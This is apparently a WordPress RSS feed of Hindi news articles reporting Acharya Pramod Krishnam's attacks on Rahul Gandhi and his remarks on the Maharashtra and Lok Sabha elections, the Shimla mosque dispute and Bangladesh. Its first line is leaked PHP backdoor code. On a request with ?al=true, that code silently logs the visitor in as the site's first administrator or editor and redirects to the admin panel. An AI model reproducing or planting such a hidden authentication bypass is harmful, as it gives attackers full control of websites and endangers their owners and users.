// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Acharya Pramod Krishnam – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 31 May 2025 15:32:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 आचार्य प्रमोद कृष्णम ने राहुल गांधी पर जोरदार तंज कसते हुए कहा- वह पाकिस्तान में काफी लोकप्रिय हैं https://pratyushaashakinayikiran.com/?p=160577 Sat, 31 May 2025 15:32:00 +0000 https://pratyushaashakinayikiran.com/?p=160577 गाजियाबाद
आचार्य प्रमोद कृष्णम ने लोकसभा में नेता प्रतिपक्ष राहुल गांधी पर शनिवार को जोरदार तंज कसते हुए कहा कि वह पाकिस्तान में काफी लोकप्रिय हैं। अगर वह पाकिस्तान से चुनाव लड़ेंगे तो यकीनन भारी मतों से जीतेंगे। आईएएनएस से बातचीत के दौरान आचार्य प्रमोद कृष्णम ने कहा कि राहुल गांधी को अपने नेताओं के बयान पर विश्वास नहीं है। उन्हें तो पाकिस्तान के नेता पर यकीन है। अगर भारत की सेना कह रही है कि हमने पाकिस्तान को मुंहतोड़ जवाब दिया है तो राहुल गांधी सबूत मांगते हैं। अगर पाकिस्तान का नेता कुछ कह दे, उस पर तुरंत यकीन कर लेते हैं। यही वजह है कि पाकिस्तान की जनता राहुल गांधी से प्यार करती है और वे भी पाकिस्तान से बहुत प्यार करते हैं।
कांग्रेस सांसद सलमान खुर्शीद और शशि थरूर की ओर से पीएम मोदी के फैसलों की प्रशंसा करने से क्या कांग्रेस में बगावत के सुर देखने को मिलेंगे। इस पर आचार्य प्रमोद कृष्णम ने कहा कि मैं इस पर टिप्पणी नहीं करना चाहता कि कांग्रेस में विद्रोह शुरू हो गया है या नहीं, लेकिन पीएम मोदी की प्रशंसा इसलिए नहीं हो रही है क्योंकि कांग्रेस नेता ऐसा कह रहे हैं, बल्कि इसलिए हो रही है क्योंकि सच्चाई सामने आ गई है। पीएम मोदी के कार्यकाल में पाकिस्तान को मुंहतोड़ जवाब दिया गया है।
ऑपरेशन सिंदूर को लेकर राहुल गांधी के आरोपों पर आचार्य प्रमोद कृष्णम ने कहा कि सेना, संसद, संविधान पर सवाल उठाना राहुल गांधी का शौक है। जैसे कोई बालक बिगड़ जाता है तो सुधरने की उम्मीद होती है। लेकिन, राहुल गांधी ऐसे बड़े घर के बालक हैं, जो काफी बिगड़े हुए हैं, जो बहुत बिगड़ चुके हैं। अब मुझे नहीं लगता है कि राहुल गांधी के सुधरने की कोई सूरत बची है। फिर भी मैं उन्हें सलाह देता हूं कि वो देश के खिलाफ ना बोलें।
कांग्रेस नेताओं की इंदिरा गांधी से पीएम मोदी की तुलना करने पर आचार्य प्रमोद कृष्णम ने कहा कि इंदिरा गांधी बहुत लोकप्रिय नेता थीं, उन्होंने पाकिस्तान को सबक सिखाया था। लेकिन, पीएम मोदी जैसा प्रधानमंत्री इस देश को अब तक नहीं मिला था। आज उनकी वजह से विश्व में भारत की धाक है।
कांग्रेस के नेता अजय राय की ओर से पीएम मोदी की पारिवारिक तस्वीरें शेयर करने पर आचार्य प्रमोद कृष्णम ने कहा कि वो तो एक मोहरा हैं, मास्टरमाइंड तो राहुल गांधी हैं। राहुल गांधी जब चुनाव हारते हैं तो उनके लिए लोकतंत्र मर जाता है। लेकिन, जब चुनाव जीतते हैं, तो लोकतंत्र उनके लिए जिंदा हो जाता है।

]]>
आचार्य प्रमोद कृष्णम का राहुल गांधी पर तंज, महाराष्ट्र ने विपक्ष का नेता बनने लायक नहीं छोड़ा https://pratyushaashakinayikiran.com/?p=102074 Sat, 23 Nov 2024 19:15:00 +0000 https://pratyushaashakinayikiran.com/?p=102074 महाराष्ट्र
महाराष्ट्र विधानसभा चुनाव के नतीजों को देखकर कांग्रेस से बाहर किए गए आचार्य प्रमोद कृष्णम ने पार्टी पर तंज कसा है। उन्होंने कांग्रेस पर तंज कसा कि विपक्ष को नेता बनने के लायक भी नहीं छोड़ा। राज्य के नतीजों की घोषणा जारी है। ताजा आंकड़े संकेत दे रहे हैं कि भारतीय जनता पार्टी, शिवसेना और राष्ट्रवादी कांग्रेस पार्टी का महायुति गठबंधन बंपर जीत की ओर जा रहा है।

उन्होंने वायनाड सांसद और कांग्रेस के वरिष्ठ नेता राहुल गांधी को टैग कर लिखा, 'महाराष्ट्र ने तो विपक्ष का नेता बनने लायक भी नहीं छोड़ा।' उन्होंने पूर्व मुख्यमंत्री और शिवसेना यूबीटी चीफ उद्धव ठाकरे को भी टैग कर लिखा, 'पालघर के साधुओं का श्राप ले डूबा।' महाराष्ट्र में महाविकास अघाड़ी 60 से कम सीटों पर सिमटती नजर आ रही है।

पालघर हादसा
अप्रैल 2020 में महाराष्ट्र के पालघर के गढ़चिंचले में तीन लोगों की मॉब लिंचिंग कर दी गई थी। कहा जा रहा था कि हमले का शिकार हुए तीनों साधु थे और एक अंतिम संस्कार में शामिल होने के लिए गुजरात के सूरत जा रहे थे। खबर है कि बच्चों को किडनैप करने वालों के शक में तीनों पर हमला कर दिया गया था। इस मामले में 101 लोग गिरफ्तार हुए थे।

महाराष्ट्र चुनाव रिजल्ट
महाराष्ट्र विधानसभा चुनाव के लिए शनिवार को जारी मतगणना के बीच महायुति गठबंधन 288 विधानसभा सीट में से 217 सीट पर बढ़त के साथ राज्य में सत्ता बरकरार रखने की ओर अग्रसर है। निर्वाचन आयोग के ताजा आंकड़ों में यह जानकारी दी गई। महाराष्ट्र विधानसभा चुनाव के लिए 20 नवंबर को मतदान हुआ था। MVA लड़खड़ाता नजर आ रहा है। एमवीए उम्मीदवार मात्र 51 सीट पर आगे हैं जबकि उसके कई नेताओं ने शनिवार सुबह तक महायुति को हराने के दावे किए थे।

]]>
शिमला मस्जिद विवाद: आचार्य प्रमोद कृष्णम ने पूछा, कहां हैं ‘सेक्युलरिज्म के सारे सूरमा’ https://pratyushaashakinayikiran.com/?p=67888 Sun, 08 Sep 2024 21:00:00 +0000 https://pratyushaashakinayikiran.com/?p=67888 नई दिल्ली
 हिमाचल प्रदेश की राजधानी शिमला के संजौली मस्जिद विवाद हाई कोर्ट तक पहुंच गया है। इस मामले में हाई कोर्ट में सुनवाई 5 अक्टूबर को होगी। इस बीच आचार्य प्रमोद कृष्णम ने रविवार को शिमला मस्जिद मामले पर प्रतिक्रिया दी। उन्होंने राहुल गांधी की चुप्पी पर सवाल उठाए। आचार्य प्रमोद कृष्णम ने राहुल गांधी और अखिलेश यादव से एक्स पर सवाल पूछा।

उन्होंने लिखा, “हिमाचल में कांग्रेस के मंत्री शिमला की “मस्जिद” ढहाने की बात कर रहे है, लेकिन अगर आज वहां भाजपा की सरकार होती तो सेक्युलरिज्म के सारे सूरमा देश को दंगों की आग में झोंक देते। अब क्योंकि वहां कांग्रेस की हुकूमत है, इसलिए राहुल गांधी से लेकर अखिलेश यादव तक मोहब्बत के सारे दुकानदार खामोश हैं।” बता दें कि बीते 30 अगस्त को मस्जिद के आसपास के इलाके में एक व्यापारी पर हमला हुआ था। इस दौरान लोगों ने मस्जिद को गिराने की मांग की।

इसके बाद 5 सितंबर को मस्जिद के बाहर बड़ी संख्या में प्रदर्शनकारी इकट्ठा हुए और मस्जिद को अवैध बताया। प्रदर्शनकारियों में भाजपा कार्यकर्ता और हिंदूवादी संगठनों के सदस्य शामिल थे। उन्होंने दावा किया कि मस्जिद को अवैध रूप से बनाया गया और इसकी चार मंजिलों का कथित तौर पर निर्माण किया गया। इसके बाद ये मामला कोर्ट तक पहुंच गया। हालांकि, हिमाचल प्रदेश वक्फ बोर्ड ने शनिवार को शिमला की एक अदालत में कहा कि यह मस्जिद उसकी जमीन पर बनी है, लेकिन इसके बारे में कोई जानकारी नहीं है कि मस्जिद में अतिरिक्त चार मंजिलों का निर्माण किसने करवाया है।

इस मामले में मुख्यमंत्री सुखविंदर सिंह सुक्खू ने कहा था कि राज्य के सभी निवासियों के समान अधिकार हैं और वह सभी धर्मों का सम्मान करते हैं। उन्होंने कहा, “शांतिपूर्ण विरोध की अनुमति है, लेकिन किसी को भी कानून अपने हाथ में लेने की अनुमति नहीं दी जाएगी।” वहीं, विधायक अनिरुद्ध सिंह ने कहा कि मस्जिद सरकारी जमीन पर बनाई गई थी और यह मामला पिछले 14 सालों से कोर्ट में विचाराधीन है।

 

]]>
आचार्य प्रमोद कृष्णम ने बांग्लादेश के मौजूदा हालात को पूरी दुनिया के लिए खतरा बताया https://pratyushaashakinayikiran.com/?p=58008 Tue, 06 Aug 2024 21:45:00 +0000 https://pratyushaashakinayikiran.com/?p=58008 अमरोहा
आचार्य प्रमोद कृष्णम ने बांग्लादेश के मौजूदा हालात को पूरी दुनिया के लिए खतरा बताया है। उन्होंने इस बात पर जोर दिया कि हमें पाकिस्तान और बांग्लादेश के मौजूदा हालात पर पैनी नजर रखनी होगी। उन्होंने कहा कि हमें इस बात का ध्यान रखना होगा कि हम इस विषय को लेकर राजनीति ना करें। वहीं, उन्होंने शेख हसीना के भारत आगमन पर कहा कि भारत की हमेशा से ही संस्कृति रही है कि शरणागत को शरण दिया जाए।

उन्होंने कहा, “जिस तरह से बांग्लादेश के हालात बिगड़े हैं, ये पूरी दुनिया के लिए एक तरह का खतरा है। पाकिस्तान के भी हालात बिगड़ रहे हैं। एक तरफ पाकिस्तान है, तो दूसरी तरफ बांग्लादेश है। दोनों ही पड़ोसी देशों में अराजकता और हिंसा की जो स्थिति पैदा हुई है, उसे देखते हुए मुझे लगता है कि भारत को बहुत सावधानी से चलना चाहिए, क्योंकि खतरा भारत पर भी मंडरा रहा है और यह खतरा विचारधारा का है। यह मौजूदा राजनीतिक परिदृश्य का खतरा है, जिसको कोई संभ्रांत राष्ट्र स्वीकार नहीं कर सकता। हमें खुशी इस बात की है कि भारत में एक सशक्त नेतृत्व है। प्रधानमंत्री नरेंद्र मोदी के नेतृत्व में भारत में एक सशक्त नेतृत्व मौजूद है, जिसे देखते हुए भारत के हितों पर किसी भी प्रकार का कुठाराघात नहीं हो सकता।”

उन्होंने आगे कहा, ”बांग्लादेश के मौजूदा संकट को ध्यान में रखते हुए केंद्र की मोदी सरकार को सतर्क रहते हुए बांग्लादेश और पाकिस्तान की हर गतिविधि पर नजर रखनी होगी। भारत के सभी राजनीतिक दल और आम लोगों को भी देश के हितों को ध्यान में रखते हुए कदम उठाने होंगे। अपने स्वार्थ में अंधे होकर राष्ट्र का नुकसान करने वाले नेताओं से मैं अपील करना चाहता हूं कि सियासत और सत्ता अपनी जगह है, लेकिन जब बात राष्ट्र की आए, तो वहां अपना स्वार्थ छोटा पड़ जाता है।”

उन्होंने कहा, “सियासत अपनी जगह है, लेकिन देशहित अपनी जगह पर है। राष्ट्र की सुरक्षा प्रथम है, लेकिन हमें एक बात समझनी होगी कि बांग्लादेश के राजनीतिक संकट की वजह से राष्ट्र की सुरक्षा को भी खतरा पैदा हो गया है। मैं प्रधानमंत्री नरेंद्र मोदी से अपील करना चाहता हूं कि मौजूदा समय में जो बांग्लादेश में भारतीय मूल के लोग हैं, उनकी सुरक्षा सुनिश्चित करने का काम वे अंतरराष्ट्रीय स्तर पर करें। बांग्लादेश में रहने वाले हिंदुओं को मारा जा रहा है, यह भी बहुत दुखद है। मैं प्रधानमंत्री से अपील करना चाहता हूं कि बांग्लादेश में जो कुछ भी हो रहा है, उसे रोकने की दिशा में काम करें, क्योंकि वे भारत ही नहीं, बल्कि वैश्विक नेता हैं। प्रधानमंत्री बांग्लादेश में घटने वाली घटनाओं पर पैनी नजर बनाए हुए हैं। मुझे पूरा विश्वास है कि आगामी दिनों में वहां स्थिति सामान्य होगी।”

बता दें कि बांग्लादेश में राजनीतिक संकट के बाद शेख हसीना प्रधानमंत्री पद से इस्तीफा देने के बाद भारत पहुंची हैं। वे हिंडन एयबरेस पर रुकी हुई हैं। बांग्लादेश की मौजूदा स्थिति को लेकर मंगलवार सुबह सर्वदलीय बैठक हुई जिसमें बांग्लादेश के हालात पर सभी राजनीतिक दलों की राय ली गई।

]]>
तीसरी बार पीएम मोदी के नेतृत्व में सरकार बनने का दावा किया: आचार्य प्रमोद कृष्णम https://pratyushaashakinayikiran.com/?p=38213 Wed, 05 Jun 2024 20:42:00 +0000 https://pratyushaashakinayikiran.com/?p=38213 नई दिल्ली
लोकसभा चुनाव के नतीजों के बाद आचार्य प्रमोद कृष्णम ने खास बातचीत की। इस दौरान उन्होंने केंद्र में तीसरी बार पीएम मोदी के नेतृत्व में सरकार बनने का दावा किया। उन्होंने अयोध्या और अमेठी में भाजपा के चुनाव हारने के पीछे की वजह भी बताई। आचार्य प्रमोद कृष्णम ने कहा कि सरकार बनाने के लिए 272 का आंकड़ा चाहिए और एनडीए के पास 292 का आंकड़ा है, ऐसे में कोई सवाल उठना ही नहीं चाहिए। उन्होंने सवाल करते हुए कहा कि जिसके पास 292 सीटें हो उसे सरकार बनाना चाहिए या 225-230 पर कूदने वालों को सरकार बनानी चाहिए।

इंडिया गठबंधन के नेताओं का दावा है कि एनडीए में शामिल घटक दलों से बात चल रही है और हम सरकार बना लेंगे। इस पर उन्होंने कहा कि ये लोग देश को लूटने के लिए सरकार बनाना चाहते हैं। देश की जनता ने तीसरी बार लगातार नरेंद्र मोदी को अपना प्यार दिया है। नरेंद्र मोदी अकेले ऐसे नेता हैं जो अपने दम पर 250 के करीब सीट लाए और एनडीए के साथ मिलकर 292 सीटें लाए हैं। तो क्या 292 सीटें लाने वाला सरकार न बनाए और ये 20, 25, 70, 90 सीट लाने वाले सरकार बनाए, इसलिए ये सवाल ही प्रासंगिक नहीं है।

उन्होंने कहा कि नरेंद्र मोदी पूरी शक्ति और सामर्थ्य के साथ तीसरी बार पीएम पद की शपथ लेंगे और एनडीए के सहयोगी चंद्रबाबू नायडू, नीतीश कुमार, चिराग पासवान, जीतन राम मांझी ये सभी लोग बहुत ही वरिष्ठ हैं और एनडीए के साथ इसका अलायंस चुनाव से पहले है।

चंद्रबाबू नायडू की ओर से कुछ अहम विभाग मांगने वाले कयासों पर उन्होंने कहा कि ये बेकार की बातें वो लोग कर रहे हैं जो इस देश को लूटना चाहते हैं। इंडिया गठबंधन को चोरों की जमात बताते हुए उन्होंने कहा कि ये सवाल वो लोग कर रहे हैं। वहीं, यूपी में इंडिया गठबंधन की बेहतर परफॉर्मेंस के सवाल पर उन्होंने कहा कि इनमें उनका कोई कमाल नहीं है। भाजपा के लोग अति उत्साह में रहे और कम वोट पोल करा पाए। अगर ठीक ठीक वोट पोल होते तो नतीजे कुछ और होते। लेकिन जनता का जो आदेश है वह जनादेश है और उसे हम स्वीकार करते हैं।

अमेठी से भाजपा की हार और रायबरेली से राहुल गांधी की जीत पर उन्होंने कहा कि अमेठी और रायबरेली दोनों ही गांधी परिवार की सीट मानी जाती है। पिछली बार जब अमेठी में भाजपा की जीत और राहुल गांधी की हार हुई थी तब एक बड़ा सवाल उठा था कि राहुल गांधी से अमेठी दूर क्यों हो गई। मुझे लगता है कि जो दूरी थी वह हट गई इसलिए अमेठी में कांग्रेस फिर से चुनाव जीत गई।

अयोध्या से भाजपा की हार पर उन्होंने कहा कि अयोध्या वासियों को यह समझना चाहिए था कि इतनी लंबी लड़ाई लड़ने के बाद सनातन को मानने वालों को ये गौरव हासिल हुआ है कि यहां राम का भव्य मंदिर बना है। इसके बाद भी यहां से भाजपा का हारना आश्चर्यजनक है। लेकिन फिर मैंने सोचा कि भगवान राम जब वहां थे तो उस समय मंथरा, कैकई भी थी और माता सीता को वनवास दिलाने वाला वह व्यक्ति भी था। सवाल है कि ये सब भी हिंदू ही थे और हिंदुओं ने भी भगवान राम को वनवास दिलाया था। उस वक्त न तो कोई मुसलमान था और न ही कोई ईसाई था, ये जो हिंदुओं में विभाजन है, यही एक दिन पतन का कारण बनेगा।

लोकसभा चुनाव के दौरान राहुल गांधी के पक्ष में पाकिस्तान की ओर से आ रहे बयानों पर उन्होंने कहा कि जो लोग भारत को कमजोर होते हुए देखना चाहते हैं, जो नरेंद्र मोदी को हटाना चाहते हैं, वह उसके साथ हैं और जो लोग भारत को सशक्त बनते हुए, विश्व गुरु बनते हुए देखना चाहते हैं वह सब नरेंद्र मोदी के साथ हैं।

]]>